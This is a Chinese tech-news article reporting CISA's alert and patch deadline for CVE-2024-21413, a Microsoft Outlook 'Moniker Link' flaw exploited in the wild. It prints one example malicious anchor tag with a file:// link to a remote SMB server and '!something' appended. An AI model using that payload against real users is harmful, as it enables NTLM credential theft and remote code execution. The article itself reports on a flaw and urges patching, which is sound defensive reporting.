微软 Outlook 被曝高危漏洞,可绕过保护视图远程执行任意代码
IT之家 2 月 7 日消息,美国网络安全与基础设施安全局(CISA)于本周四发出通知,要求所有美国联邦机构在三周内(截至2月27日)为其系统安装补丁,以修复微软 Outlook 中的高风险远程代码执行漏洞。
这一漏洞是由网络安全公司 Check Point Research 的安全专家 Haifei Li 首先发现,编号为 CVE-2024-21413。
CISA 表示,已有证据显示黑客正在利用该漏洞进行攻击。攻击者可以绕过保护视图(此视图旨在以只读模式打开 Office 文件,以防止恶意内容的嵌入),以编辑模式打开受感染的 Office 文件,进而获得远程代码执行的权限。
攻击者通过一种名为“Moniker Link”的安全机制,成功绕过 Outlook 的恶意链接保护,使用 file:// 协议,并在指向攻击者控制的服务器的链接中加入感叹号和随机文本(例如 "!something"),将其嵌入到电子邮件中。
IT之家提供了一个示例:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
CVE-2024-21413 影响多个版本的 Office 产品,包括 Microsoft Office LTSC 2021、Microsoft 365 应用程序企业版、Microsoft Outlook 2016 以及 Microsoft Office 2019。
如果黑客成功发动攻击,将能够窃取 NTLM 凭证,并通过恶意 Office 文档执行任意代码。CISA 已将此漏洞录入其已知被利用漏洞 (KEV) 目录,并标注为正在被活跃利用的漏洞。
CISA 强调,此类漏洞是恶意网络攻击者常用的攻击手段,对联邦机构造成了重大风险。尽管 CISA 主要侧重于提醒联邦机构尽快进行漏洞修复,但也建议私营企业优先进行此类漏洞的修补,以防止正在进行的攻击。
广告声明:文中包含的对外链接(包括但不限于超链接、二维码、口令等形式),旨在传递更多信息,节省筛选时间,结果仅供参考。
1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。